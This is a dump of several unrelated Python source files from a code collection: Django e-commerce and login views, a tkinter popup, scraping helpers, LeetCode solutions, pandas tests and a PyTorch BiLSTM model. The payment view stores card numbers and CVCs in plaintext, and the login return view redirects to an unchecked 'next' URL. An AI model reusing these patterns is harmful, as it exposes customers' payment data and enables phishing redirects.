detail.quantity = ps.quantity\n\n if ps.product.variant == 'None':\n detail.price = ps.product.price\n else:\n detail.price = ps.variant.price\n\n detail.variant_id = ps.variant_id\n\n if 
ps.product.variant == 'None':\n detail.amount = ps.amount\n else:\n detail.amount = ps.varamount\n detail.save()\n\n if ps.product.variant == 'None': \n product = Product.objects.get(id=ps.product_id)\n product.save()\n \n else:\n variant = Variants.objects.get(id=ps.product_id)\n variant.quantity -= ps.quantity\n variant.save()\n\n \n messages.success(request, 'Your Order has been completed. Thakes You')\n return HttpResponseRedirect(\"/order/payment\")\n \n else:\n messages.warning(request, form.errors)\n return HttpResponseRedirect(\"/order/checkout\")\n\n form = OrderForm()\n shopcart = ShopCart.objects.filter(user_id = current_user.id)\n order = OrderProduct.objects.filter(user_id = current_user.id)\n profile = UserProfile.objects.get(user_id=current_user.id)\n context = {'order':order,\n 'shopcart':shopcart,\n 'profile':profile,\n 'form':form,\n 'total':total}\n return render(request,'checkout.html',context)\n\n\n\ndef payment(request):\n current_user= request.user\n order = ShopCart.objects.filter(user_id = current_user.id)\n profile = UserProfile.objects.get(user_id=current_user.id)\n count = ShopCart.objects.filter(user_id = current_user.id).count()\n\n if count == 0: \n return HttpResponseRedirect('/')\n else:\n add_value = 0\n for ps in order:\n add_value += int(ps.price) * ps.quantity\n\n if request.method =='POST':\n card_number = request.POST['card_number']\n full_name = request.POST['full_name']\n last_month = request.POST['last_month']\n cvc = request.POST['cvc']\n\n if len(card_number) <= 11 or len(card_number) >= 13:\n messages.error(request,\"Card Number is not correct\")\n elif len(full_name) <= 5:\n messages.error(request,\"Please enter more than 6 letter not correct\")\n\n return HttpResponseRedirect('/order/payment')\n\n data = Payment(card_number=card_number, full_name=full_name, last_month=last_month,cvc=cvc)\n data.save()\n messages.success(request, 'Your Order has been completed. 
Thakes You')\n return HttpResponseRedirect(\"/order/review\")\n\n \n context = {'order':order,'profile':profile,'add_value':add_value,}\n return render(request,'payment.html',context)\n\n\ndef review(request):\n current_user = request.user\n shopcart = ShopCart.objects.filter(user_id = current_user.id)\n profile = UserProfile.objects.filter(user_id = current_user.id)\n payment = Payment.objects.filter(create_at__lte=timezone.now()).order_by('create_at')[:1]\n count = ShopCart.objects.filter(user_id = current_user.id).count()\n\n if count == 0: \n return HttpResponseRedirect('/')\n else:\n total = 0\n for ps in shopcart:\n if ps.product.variant == 'None':\n total += ps.product.price * ps.quantity\n else:\n total += ps.variant.price * ps.quantity\n\n context = {'payment':payment,\n 'shopcart':shopcart,\n 'total':total,\n 'profile':profile}\n return render(request,'review.html',context)\n\ndef thanku(request):\n current_user = request.user\n count = ShopCart.objects.filter(user_id = current_user.id).count()\n\n if count == 0: \n return HttpResponseRedirect('/')\n else:\n ShopCart.objects.filter(user_id=current_user.id).delete()\n\n request.session['cart_items'] = 0\n context = {\n 'shopcart':shopcart,\n }\n return render(request,'thanku.html',context)","sub_path":"Ecomerce new/order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"512550107","text":"import tkinter as tk\n\nclass Popup(tk.Toplevel):\n\tdef __init__(self,master):\n\t\ttk.Toplevel.__init__(self,master)\n\t\tself.master = master\n\t\tself.resizable(width=False,height=False)\n\t\tself.wm_title('Head Pose Option')\n\n\t\tself.headPoseOption = tk.StringVar(value = 'hopenet')\n\n\n\t\thopenet = tk.Radiobutton(self,text='HopeNet',variable=self.headPoseOption,value='hopenet',height=5,width=30,command= lambda:logger.info('HopeNet head pose estimator is selected'))\n\t\tdeepgaze = tk.Radiobutton(self,text='DeepGaze',variable=self.headPoseOption,value='deepgaze',height=5,width=30,command= lambda:logger.info('DeepGaze head pose estimator is selected'))\n\n\t\thopenet.pack()\n\t\tdeepgaze.pack()\n\n\t\tself.focus()\n\nif __name__ == '__main__':\n\troot = tk.Tk()\n\tpopup = Popup(root)\n\tpopup.wait_window()\n\troot.mainloop()","sub_path":"menu/popup/headPose.py","file_name":"headPose.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"454935057","text":"from bs4 import BeautifulSoup\nimport requests\n\n\nclass UniqueID:\n def __init__(self, league_id, league_name, team_id, team_name, team_order, week_id, time_id=0):\n self.league_id = league_id\n self.team_id = team_id\n self.week = week_id\n self.time = time_id\n self.team_name = team_name\n self.league_name = league_name\n self.team_order = team_order\n\n def get_id_array(self):\n return [self.league_id, self.league_name, self.team_id, self.team_name, self.team_order, self.week, self.time]\n\n def get_id_string(self):\n return 'ID: ' + 'Week ' + str(self.week) + ' Time ' + str(self.time) + ', ' + str(self.league_id) + \", \" + str(self.team_id)\n\n\ndef get_soup_url(url):\n page = requests.get(url)\n soup = BeautifulSoup(page.content, 'html.parser')\n return soup\n\n\ndef get_soup_file(html_file):\n with open(html_file) as current_html:\n soup = BeautifulSoup(current_html, 'html.parser')\n return soup\n\n\ndef floatify(array):\n for index in range(len(array)):\n 
try:\n array[index] = float(array[index])\n except Exception as e:\n # print(e)\n pass\n return array\n\n\ndef player_data_float_convert(player_data):\n all_info = []\n for player_info in player_data:\n new_player = []\n for item in range(len(player_info)):\n try:\n new_player.append(float(player_info[item]))\n except Exception as e:\n new_player.append(player_info[item])\n all_info.append(new_player)\n return all_info\n\n\n","sub_path":"archive/Helper.py","file_name":"Helper.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"560600296","text":"# 作弊的写法,不过也能通过,还能击败95%的人!\nclass Solution:\n def multiply(self, num1, num2):\n \"\"\"\n :type num1: str\n :type num2: str\n :rtype: str\n \"\"\"\n return str(int(num1) * int(num2))\n\n\n# 模仿在纸上做乘法的过程写出一个算法\nclass Solution(object):\n def multiply(self, num1, num2):\n \"\"\"\n :type num1: str\n :type num2: str\n :rtype: str\n \"\"\"\n if num1 == \"0\" or num2 == \"0\":\n return \"0\"\n ans = \"0\"\n index = 0\n for i in range(len(num2) - 1, -1, -1):\n # 保存进位\n carry = 0\n # 直接用字符串保存每一位乘出来的数\n ans_part = \"\"\n # num2当前数字保存在x2中\n x2 = ord(num2[i]) - ord(\"0\")\n # 乘上num1的每一位\n for j in range(len(num1) - 1, -1, -1):\n x1 = ord(num1[j]) - ord(\"0\")\n # 相乘的结果加上进位\n mul = x2 * x1 + carry\n ans_part = str(mul % 10) + ans_part\n carry = mul // 10\n if carry > 0:\n ans_part = str(carry) + ans_part\n for k in range(index):\n ans_part += \"0\"\n index += 1\n # 和之前的结果相加\n # 两个str相加并返回str,leetcode-415\n ans = self.addStrings(ans, ans_part)\n return ans\n\n def addStrings(self, num1, num2):\n \"\"\"\n :type num1: str\n :type num2: str\n :rtype: str\n \"\"\"\n if not num1:\n return num2\n if not num2:\n return num1\n res = ''\n # count存储进位\n count = 0\n m, n = len(num1), len(num2)\n # 1.使两个字符串长度匹配\n if m > n:\n num2 = \"0\" * (m - n) + num2\n elif m < n:\n num1 = \"0\" * (n - m) + num1\n i, j = len(num1) - 1, len(num2) - 1\n while i >= 0 and j >= 0:\n # 将str转换为int,不使用int(),使用ASCII码相减,或者使用一个list或dict存储0-9和\"0\"-\"9\"的对应也行\n value = ord(num1[i]) + ord(num2[j]) + count - 2 * ord(\"0\")\n if value >= 10:\n count = 1\n res = str(value % 10) + res\n else:\n count = 0\n res = str(value) + res\n i -= 1\n j -= 1\n # 最后输出结果的时候要判断有没有进位\n return \"1\" + res if count == 1 else res\n\n\nclass Solution:\n def multiply(self, num1, num2):\n \"\"\"\n :type num1: str\n :type num2: str\n :rtype: str\n \"\"\"\n # 需要考虑两个问题\n # 1.字符串和数字的相互转换,不使用str或者int函数\n # 2.数字的相乘可能会溢出(python3中int就是long,不需要考虑,但这题需要考虑)\n if num1 == '0' or num2 == '0':\n return \"0\"\n m, n = len(num1), len(num2)\n # m位数和n位数的乘积是一个min(m,n)到m+n位的数\n pos = [0 for _ in range(m + n)]\n # 两个数都从最后一位开始,逆序相乘\n for i in range(m - 1, -1, -1):\n for j in range(n - 1, -1, -1):\n # 把字符串转换为数字,不使用int,可以使用ord相减,ord是ASCII码,其他语言中\n # 可以直接字符串相减,python中不行\n # 相乘的结果\n mul = (ord(num1[i]) - ord('0')) * (ord(num2[j]) - ord('0'))\n # num1 的第 i 位乘上 num2 的第 j 位,结果会分别对应 pos 的第 i + j 位和第 i + j + 1 位\n p1, p2 = i + j, i + j + 1\n # 当前位��结果等于mul加上之前的进位\n sum_ = mul + pos[p2]\n\n pos[p1] += sum_ // 10\n pos[p2] = sum_ % 10\n result = []\n # result = pos从第一个不为0的值开始往后的所有值\n for p in pos:\n if len(result) != 0 or p != 0:\n result.append(p)\n return ''.join(str(s) for s in result)\n\n\nnum1 = '123'\nnum2 = '456'\nprint(Solution().multiply(num1, num2))\n","sub_path":"multiply_strings_43.py","file_name":"multiply_strings_43.py","file_ext":"py","file_size_in_byte":4217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} 
+{"seq_id":"511867626","text":"#測試pandas的Series、DataFrame\n\nimport pandas as pd\n\ns = pd.Series([1,343,'ddd'])\ns2 = pd.Series([1,3,33,'string'],index=[3,4,5,8])\ns3 = pd.Series([1,3,5,'string2'],name='s3的名字')\ns4 = s2.append(s3)\nprint (s4)\n#Series就像橫向(行)的dict變成直向版本 ,一維數組,no columns\n#切片賦值可 ##### Series的要素是index、data\n\n#以下為二維數組,dataframe,就是表格,并同時有index、columns\n#list of dict,多個Series可構建為一個dataframe\n##### dataframe的要素是index、columns、data\n\ndata = {'a':[1,2,3,4],'z':[4,5,5,'dd']}#字典已經包含columns、data\n#創建dataframe\ndf0 = pd.DataFrame(data,index=['第一行','第2行','第三hang','44thRow'])\ndf1 = pd.DataFrame({'公司名稱':'codeForShop','dfsdf':'dfa'},index=['第2行'])\ndf =df0.append(df1)\n\n\n\n\nprint (df)\n#用series和dataframe開一個空白行(行!是行)\n","sub_path":"PythonPandas/testPandas.py","file_name":"testPandas.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"152976195","text":"import urllib\n\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.core.urlresolvers import reverse\n\nfrom pyroven.utils import setting, HttpResponseSeeOther\nimport pyroven\n\ndef raven_return(request):\n # Get the token which the Raven server sent us - this should really\n # have a try/except around it to catch KeyError\n token = request.GET['WLS-Response']\n\n # See if this is a valid token\n try:\n user = authenticate(response_str=token, request=request)\n except pyroven.MalformedResponseError:\n return HttpResponseRedirect(\"/\")\n except Exception as e:\n return HttpResponse(e)\n\n if user is None:\n \"Print no user\"\n elif not user.is_active:\n return HttpResponse(\"Your account has been disabled\")\n else:\n login(request, user)\n\n # Redirect somewhere sensible\n next_page = request.GET.get('next', '/')\n if next_page == \"\":\n next_page = \"/\"\n\n extra_url_arg_values = {}\n extra_url_args = set(setting('PYROVEN_PASSTHROUGH_URL_ARGS', []))\n for k in extra_url_args:\n if k in request.GET:\n extra_url_arg_values[k] = request.GET.get(k)\n\n url_extra = ''\n if len(extra_url_args) > 0:\n url_extra = \"?%s\" % \"&\".join([\"%s=%s\" % (k, v) for (k, v) in extra_url_arg_values.items()])\n\n return HttpResponseRedirect(next_page + url_extra)\n\ndef raven_login(request):\n # Get the Raven object and return a redirect to the Raven server\n login_url = setting('PYROVEN_LOGIN_URL')\n if login_url is None:\n raise Exception(\"pyroven error: You must define PYROVEN_LOGIN_URL in your project settings file.\")\n\n extra_url_arg_values = {}\n extra_url_args = set(setting('PYROVEN_PASSTHROUGH_URL_ARGS', []))\n extra_url_args.add('next')\n for k in extra_url_args:\n if k in request.GET:\n extra_url_arg_values[k] = request.GET.get(k)\n\n url_extra = ''\n if len(extra_url_args) > 0:\n url_extra = \"?%s\" % \"&\".join([\"%s=%s\" % (k, v) for (k, v) in extra_url_arg_values.items()])\n\n relative_return_url = \"%s%s\" % (reverse('raven_return'), url_extra)\n\n encoded_return_url = urllib.quote(request.build_absolute_uri(relative_return_url))\n return HttpResponseSeeOther(\"%s?ver=%d&url=%s\" % (login_url, 2,\n encoded_return_url)\n )\n\ndef raven_logout(request):\n logout(request)\n","sub_path":"pyroven/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"247140653","text":"from datetime import date\r\nfrom .models import Ads,View\r\n# Checks 
the ads expiry date and deletes it if it has expired\r\ndef landlord(request,ads):\r\n\t# Checks todays date\r\n\ttoday = date.today()\r\n\t\r\n\t# Loops over the queryset\r\n\tfor ad in ads:\r\n\t\t\r\n\t\t# Calculate the days btw\r\n\t\ttime_notice = today - ad.date_adder\r\n\t\t\r\n\t\tprint(ad.date_adder,ad,time_notice)\r\n\t\t# If the days btw is greater than the allocated time\r\n\t\tif time_notice.days >= int(ad.time_wait):\r\n\t\t\t\r\n\t\t\t# Stop the ad\r\n\t\t\tad.expired = 'True'\r\n\r\n\t\t\t# Save to the database\r\n\t\t\tad.save()\r\n\r\n# For the user ad owner\r\ndef admin_landlord(request,ad):\r\n\t# Checks todays date\r\n\ttoday = date.today()\r\n\t\r\n\t# Calculate the days btw\r\n\ttime_notice = today - ad.date_adder\r\n\r\n\t# Day remaining\r\n\tdays = int(ad.time_wait) - time_notice.days\r\n\t\r\n\t# If the days btw is greater than the allocated time\r\n\tif time_notice.days >= int(ad.time_wait):\r\n\t\t\r\n\t\t# Stop the ad\r\n\t\tad.expired = 'True'\r\n\r\n\t\t# Save to the database\r\n\t\tad.save()\r\n\r\n\treturn days\r\n\r\n# Calculates the number of users that saw it\r\ndef seen_by(request,ads):\r\n\t# Lops over the ads\r\n\tfor ad in ads:\r\n\t\t# Gets the one that is currently being seen\r\n\t\tadsee = Ads.objects.get(id=ad.id)\r\n\t\t# Increments the ads views\r\n\t\tad.views = ad.views + 1\r\n\t\t# Creates a view object for date analytics\r\n\t\tad_me = View.objects.create(ads=adsee,views_cal='v')\r\n\t\t# Saves the view object being created \r\n\t\tad_me.save()\r\n\t\t# Saves th\r\n\t\tad.save()","sub_path":"adengine/analytics.py","file_name":"analytics.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"233088325","text":"\r\nimport pickle\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn.functional as F\r\nfrom sklearn.model_selection import train_test_split\r\nfrom torch import nn\r\nfrom torch.autograd import Variable\r\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\r\nfrom torch.utils.data import Dataset\r\nif torch.cuda.is_available():\r\n device = torch.device(\"cuda:0\") # you can continue going on here, like cuda:1 cuda:2....etc.\r\nelse:\r\n device = torch.device(\"cpu\")\r\n\r\n# device = torch.device(\"cpu\")\r\ndef lossFunction(all_outputs, labels_all):\r\n error = nn.MSELoss(size_average=None, reduce=None, reduction='mean') # mean\r\n\r\n outputs = torch.flatten(all_outputs[0]) # label\r\n outputs_l = torch.flatten(all_outputs[1]) # label\r\n outputs_d = torch.flatten(all_outputs[2]) # label\r\n outputs_c = torch.flatten(all_outputs[3]) # label\r\n\r\n labels = torch.flatten(labels_all[:, -1])\r\n # Calculate softmax and ross entropy loss\r\n # loss = error(outputs, labels)\r\n loss_out = error(outputs, labels) # labels in ns\r\n loss_l = error(outputs_l, labels_all[:, 0].view(labels_all.size()[0]))\r\n loss_d = error(outputs_d, labels_all[:, 1].view(labels_all.size()[0]))\r\n loss_c = error(outputs_c, labels_all[:, 2].view(labels_all.size()[0]))\r\n\r\n # Calculating auto gradients\r\n loss_seq = []\r\n loss_seq.append(loss_l)\r\n loss_seq.append(loss_d)\r\n loss_seq.append(loss_c)\r\n # loss_seq.append((loss_l + loss_d + loss_c)/3)\r\n loss_seq.append(loss_out)\r\n return loss_seq\r\n\r\nclass NumbersDataset(Dataset):\r\n def __init__(self, x, lens, y):\r\n self.x = x\r\n self.lens = lens\r\n self.y = y\r\n\r\n def __len__(self):\r\n return len(self.y)\r\n\r\n def __getitem__(self, idx):\r\n return self.x[idx], 
self.lens[idx], self.y[idx]\r\n\r\nclass MLP(torch.nn.Module):\r\n def __init__(self, input_dim, hidden_dim, output_dim):\r\n super(MLP, self).__init__()\r\n self.input_dim = input_dim\r\n self.hidden_dim = hidden_dim\r\n self.fc1 = torch.nn.Linear(self.input_dim, self.hidden_dim)\r\n self.fc2 = torch.nn.Linear(self.hidden_dim, self.hidden_dim)\r\n self.fc3 = torch.nn.Linear(self.hidden_dim, output_dim)\r\n\r\n def forward(self, x):\r\n # print(x.size())\r\n hidden = torch.tanh(self.fc1(x))\r\n # hidden = F.relu(self.fc1(x))\r\n output = self.fc3(hidden) # output layer\r\n #----another design-----------\r\n # hidden_1 = self.fc1(x))\r\n # print(hidden_1.size())\r\n # hidden_2 = F.relu(self.fc2(hidden_1))\r\n # hidden_2 = F.tanh(self.fc2(hidden_1))\r\n # print(hidden_2.size())\r\n # out = F.dropout(hidden_2, training=self.training)\r\n # output = self.fc3(out) # output layer\r\n # print(output.size())\r\n\r\n return output\r\n\r\nclass RNNModel(nn.Module):\r\n def __init__(self, input_dim, hidden_dim, layer_dim, output_dim):\r\n super(RNNModel, self).__init__()\r\n # Number of hidden dimensions\r\n self.hidden_dim = hidden_dim\r\n\r\n # Number of hidden layers\r\n self.layer_dim = layer_dim\r\n\r\n # RNN\r\n # self.rnn = nn.LSTM(input_dim, hidden_dim, layer_dim, batch_first=True)\r\n self.rnn = nn.LSTM(input_dim, hidden_dim, layer_dim, batch_first=True, bidirectional=True)\r\n # tensor containing the output features (h_t) from the last layer of the LSTM\r\n\r\n # Readout layer\r\n # self.fc = nn.Linear(hidden_dim, hidden_dim) # layer conversion\r\n self.fc = nn.Linear(hidden_dim * 4, hidden_dim) # 2 for bidirection\r\n self.fc1 = nn.Linear(hidden_dim * 3, hidden_dim) # 3 for concatenating 3 bilstm\r\n self.fc2 = nn.Linear(hidden_dim, output_dim) # layer conversion\r\n\r\n def forward(self, x_l, x_d, x_c):\r\n # Set initial states\r\n h0_l = torch.zeros(self.layer_dim * 2, x_l.size(0), self.hidden_dim).to(device) # 2 for bidirection\r\n c0_l = torch.zeros(self.layer_dim * 2, x_l.size(0), self.hidden_dim).to(device)\r\n # print(h0_l.size()) #[layer*2, hidden_dimension, batch_size]\r\n h0_d = torch.zeros(self.layer_dim * 2, x_d.size(0), self.hidden_dim).to(device) # 2 for bidirection\r\n c0_d = torch.zeros(self.layer_dim * 2, x_d.size(0), self.hidden_dim).to(device)\r\n\r\n h0_c = torch.zeros(self.layer_dim * 2, x_c.size(0), self.hidden_dim).to(device) # 2 for bidirection\r\n c0_c = torch.zeros(self.layer_dim * 2, x_c.size(0), self.hidden_dim).to(device)\r\n\r\n # Forward propagate LSTM\r\n out_l_a, _l = self.rnn(x_l, (h0_l, c0_l)) # out: tensor of shape (batch_size, seq_length, hidden_size*2)\r\n # print(out_l.size()) #[batch, 5, hidden*2] # 5 is the maximum pair of l_type in one path\r\n out_d_a, _d = self.rnn(x_d, (h0_d, c0_d)) # out: tensor of shape (batch_size, seq_length, hidden_size*2)\r\n # out_d_init, _d_init = self.rnn(x_d[:, 0:1, :], (h0_d, c0_d)) # out: tensor of shape (batch_size, seq_length, hidden_size*2)\r\n # print(out_d_init.size()) #[batch, 1, hidden*2]\r\n # out_d_mid, _d_mid = self.rnn(x_d[:, 1:-1, :], (h0_d, c0_d)) # out: tensor of shape (batch_size, seq_length, hidden_size*2)\r\n # print(out_d_mid.size()) #[batch, 26, hidden*2]\r\n # out_d_last, _d_last = self.rnn(x_d[:, -1:x_d.size(1), :], (h0_d, c0_d)) # out: tensor of shape (batch_size, seq_length, hidden_size*2)\r\n # print(out_d_a[:, 0, :].size()) #[batch, 1, hidden*2]\r\n # print(out_d_a[:, -1, :].size()) # [batch, 1, hidden*2]\r\n\r\n # out_d = torch.cat((torch.cat((out_d_init, out_d_mid), dim=1), out_d_last), 
dim=1)\r\n # print(out_d.size()) #[batch, 28, hidden*2] # 28 is the maximum pair of d_type in one path\r\n\r\n out_c_a, _c = self.rnn(x_c, (h0_c, c0_c)) # out: tensor of shape (batch_size, seq_length, hidden_size*2)\r\n # print(out_c.size()) #[batch, 5, hidden*2] # 5 is the maximum pair of c_type in one path\r\n\r\n # # Decode the hidden state of the last time step of forward path\r\n # out_l_f = self.fc(out_l[:, -1, :])\r\n # out_d_f = self.fc(out_d[:, -1, :])\r\n # out_c_f = self.fc(out_c[:, -1, :])\r\n # # Decode the hidden state of the last time step of reverse path\r\n # out_l_r = self.fc(out_l[:, 0, :])\r\n # out_d_r = self.fc(out_d[:, 0, :])\r\n # out_c_r = self.fc(out_c[:, 0, :])\r\n\r\n # merging two cell final stages of forward and reverse path\r\n out_d = F.relu(self.fc(torch.cat((out_d_a[:, -1, :], out_d_a[:, 0, :]), dim=1)))\r\n out_l = F.relu(self.fc(torch.cat((out_l_a[:, -1, :], out_l_a[:, 0, :]), dim=1)))\r\n out_c = F.relu(self.fc(torch.cat((out_c_a[:, -1, :], out_c_a[:, 0, :]), dim=1)))\r\n\r\n # merging all cell final stages\r\n # out_d = F.relu(nn.Linear(torch.flatten(out_d_a, start_dim=1).size()[1], self.hidden_dim)(torch.flatten(out_d_a, start_dim=1)))\r\n # out_l = F.relu(nn.Linear(torch.flatten(out_l_a, start_dim=1).size()[1], self.hidden_dim)(torch.flatten(out_l_a, start_dim=1)))\r\n # out_c = F.relu(nn.Linear(torch.flatten(out_c_a, start_dim=1).size()[1], self.hidden_dim)(torch.flatten(out_c_a, start_dim=1)))\r\n\r\n\r\n out_ld = torch.cat((out_l, out_d), dim=1)\r\n out_ldc = torch.cat((out_ld, out_c), dim=1)\r\n # print(out_ldc.size()) #[batch, hidden*3]\r\n\r\n out = F.relu(self.fc1(out_ldc)) # activation layer\r\n # print(out.size()) #[batch, hidden]\r\n out = F.dropout(out, training=self.training)\r\n out = self.fc2(out) # output layer\r\n # print(out.size()) #[hidden, 1]\r\n\r\n return out\r\n\r\nclass BiLSTM_MLP(nn.Module):\r\n def __init__(self, input_dim, hidden_dim, layer_dim, output_dim, dropout=0.1):\r\n '''Everything which contains weights which you want to be trained during the training process should be defined in your __init__ method.\r\n You don't need do define activation functions like softmax, ReLU or sigmoid in your __init__, you can just call them in forward.'''\r\n super(BiLSTM_MLP, self).__init__()\r\n # Number of hidden dimensions\r\n self.hidden_dim = hidden_dim\r\n\r\n # Number of hidden layers\r\n self.layer_dim = layer_dim\r\n\r\n self.dropout = dropout\r\n\r\n # RNN\r\n # self.rnn = nn.LSTM(input_dim, hidden_dim, layer_dim, batch_first=True)\r\n self.rnn = nn.LSTM(input_dim, hidden_dim, layer_dim, batch_first=True, bidirectional=True)\r\n # tensor containing the output features (h_t) from the last layer of the LSTM\r\n\r\n # Readout layer\r\n # self.fc = nn.Linear(hidden_dim, hidden_dim) # layer conversion\r\n self.fc = nn.Linear(hidden_dim * 4, hidden_dim) # 2 for bidirection\r\n # self.fc1 = nn.Linear((hidden_dim * 3), (hidden_dim * 2)) # 3 for concatenating 3 bilstm\r\n # self.fc1 = nn.Linear((hidden_dim * 3), (hidden_dim * 2))\r\n # self.fc1 = nn.Linear((hidden_dim * 3), hidden_dim * 2) # 3 for concatenating 3 bilstm\r\n self.fc1 = nn.Linear((hidden_dim * 3)+1, hidden_dim * 2) # 3 for concatenating 3 bilstm + voltage\r\n # self.fc1 = nn.Linear((hidden_dim * 3) + 3, hidden_dim*2) # 3 for concatenating 3 bilstm + 3 sublabels\r\n # self.fc1 = nn.Linear((hidden_dim * 3) + 4, hidden_dim) # 3 for concatenating 3 bilstm + 3 sublabels + setup\r\n self.fc2 = nn.Linear(hidden_dim*2, output_dim) # layer conversion\r\n # self.fc3 = 
nn.Linear(hidden_dim, output_dim) # layer conversion\r\n self.fc3 = nn.Linear(hidden_dim + 1, output_dim) # layer conversion\r\n\r\n # ----\r\n self.fc_l = nn.Linear(hidden_dim * 4*2, hidden_dim) # 2 for bidirection\r\n self.fc_d = nn.Linear(hidden_dim * 28*2, hidden_dim) # 2 for bidirection\r\n self.fc_c = nn.Linear(hidden_dim * 4*2, hidden_dim) # 2 for bidirection\r\n\r\n\r\n\r\n def forward(self, x_l, x_d, x_c, x_vs):\r\n\r\n # Set initial states\r\n h0_l = torch.zeros(self.layer_dim * 2, x_l.size(0), self.hidden_dim).to(device) # 2 for bidirection\r\n c0_l = torch.zeros(self.layer_dim * 2, x_l.size(0), self.hidden_dim).to(device)\r\n # print(h0_l.size()) #[layer*2, hidden_dimension, batch_size]\r\n h0_d = torch.zeros(self.layer_dim * 2, x_d.size(0), self.hidden_dim).to(device) # 2 for bidirection\r\n c0_d = torch.zeros(self.layer_dim * 2, x_d.size(0), self.hidden_dim).to(device)\r\n\r\n h0_c = torch.zeros(self.layer_dim * 2, x_c.size(0), self.hidden_dim).to(device) # 2 for bidirection\r\n c0_c = torch.zeros(self.layer_dim * 2, x_c.size(0), self.hidden_dim).to(device)\r\n\r\n # Forward propagate LSTM\r\n out_l_a, _l = self.rnn(x_l, (h0_l, c0_l)) # out: tensor of shape (batch_size, seq_length, hidden_size*2)\r\n out_d_a, _d = self.rnn(x_d, (h0_d, c0_d)) # out: tensor of shape (batch_size, seq_length, hidden_size*2)\r\n out_c_a, _c = self.rnn(x_c, (h0_c, c0_c)) # out: tensor of shape (batch_size, seq_length, hidden_size*2)\r\n\r\n # merging two cell final stages of forward and reverse path\r\n # Activation layer 1\r\n #-----------selu-------------\r\n out_l = F.selu(self.fc(torch.cat((out_l_a[:, -1, :], out_l_a[:, 0, :]), dim=1)))\r\n out_d = F.selu(self.fc(torch.cat((out_d_a[:, -1, :], out_d_a[:, 0, :]), dim=1)))\r\n out_c = F.selu(self.fc(torch.cat((out_c_a[:, -1, :], out_c_a[:, 0, :]), dim=1)))\r\n\r\n #----Selu/Taking all o/p of bilstm-----\r\n # print(out_l_a.reshape(out_l_a.shape[0],( out_l_a.shape[1]*out_l_a.shape[2])).shape)\r\n # print(out_l_a.shape)\r\n # out_l = F.selu(self.fc_l(out_l_a.reshape(out_l_a.shape[0],( out_l_a.shape[1]*out_l_a.shape[2]))))\r\n # out_d = F.selu(self.fc_l(out_l_a.reshape(out_d_a.shape[0],( out_l_a.shape[1]*out_d_a.shape[2]))))\r\n # out_c = F.selu(self.fc_l(out_l_a.reshape(out_c_a.shape[0],( out_l_a.shape[1]*out_c_a.shape[2]))))\r\n #-----------relu-------------\r\n # out_l = F.relu(self.fc(torch.cat((out_l_a[:, -1, :], out_l_a[:, 0, :]), dim=1)))\r\n # out_d = F.relu(self.fc(torch.cat((out_d_a[:, -1, :], out_d_a[:, 0, :]), dim=1)))\r\n # out_c = F.relu(self.fc(torch.cat((out_c_a[:, -1, :], out_c_a[:, 0, :]), dim=1)))\r\n #--------------rrelu------------\r\n # out_l = F.rrelu(self.fc(torch.cat((out_l_a[:, -1, :], out_l_a[:, 0, :]), dim=1)))\r\n # out_d = F.rrelu(self.fc(torch.cat((out_d_a[:, -1, :], out_d_a[:, 0, :]), dim=1)))\r\n # out_c = F.rrelu(self.fc(torch.cat((out_c_a[:, -1, :], out_c_a[:, 0, :]), dim=1)))\r\n #--------------tanhshrink--------\r\n # out_l = F.tanhshrink(self.fc(torch.cat((out_l_a[:, -1, :], out_l_a[:, 0, :]), dim=1)))\r\n # out_d = F.tanhshrink(self.fc(torch.cat((out_d_a[:, -1, :], out_d_a[:, 0, :]), dim=1)))\r\n # out_c = F.tanhshrink(self.fc(torch.cat((out_c_a[:, -1, :], out_c_a[:, 0, :]), dim=1)))\r\n #--------------tanh--------------\r\n # out_l = F.tanh(self.fc(torch.cat((out_l_a[:, -1, :], out_l_a[:, 0, :]), dim=1)))\r\n # out_d = F.tanh(self.fc(torch.cat((out_d_a[:, -1, :], out_d_a[:, 0, :]), dim=1)))\r\n # out_c = F.tanh(self.fc(torch.cat((out_c_a[:, -1, :], out_c_a[:, 0, :]), dim=1)))\r\n 
#--------------softmax------------\r\n # out_l = nn.Softmax(dim=1)(self.fc(torch.cat((out_l_a[:, -1, :], out_l_a[:, 0, :]), dim=1)))\r\n # out_d = nn.Softmax(dim=1)(self.fc(torch.cat((out_d_a[:, -1, :], out_d_a[:, 0, :]), dim=1)))\r\n # out_c = nn.Softmax(dim=1)(self.fc(torch.cat((out_c_a[:, -1, :], out_c_a[:, 0, :]), dim=1)))\r\n\r\n # sub_label_prediction:\r\n # sub_l = self.fc3(out_l)\r\n # sub_d = self.fc3(out_d)\r\n # sub_c = self.fc3(out_c)\r\n sub_l = self.fc3(torch.cat((out_l, x_vs[:, 0].view(x_vs.size()[0], 1)), dim=1)) # voltage\r\n sub_d = self.fc3(torch.cat((out_d, x_vs[:, 0].view(x_vs.size()[0], 1)), dim=1)) # voltage\r\n sub_c = self.fc3(torch.cat((out_c, x_vs[:, 0].view(x_vs.size()[0], 1)), dim=1)) # voltage\r\n # sub_l = F.selu(self.fc3(F.dropout(out_l, p=self.dropout, training=self.training)))\r\n # sub_d = F.selu(self.fc3(F.dropout(out_d, p=self.dropout, training=self.training)))\r\n # sub_c = F.selu(self.fc3(F.dropout(out_c, p=self.dropout, training=self.training)))\r\n\r\n # sub_l = F.tanh(self.fc3(out_l))\r\n # sub_d = F.tanh(self.fc3(out_d))\r\n # sub_c = F.tanh(self.fc3(out_c))\r\n\r\n\r\n\r\n # concatenating without sublabels\r\n out_ld = 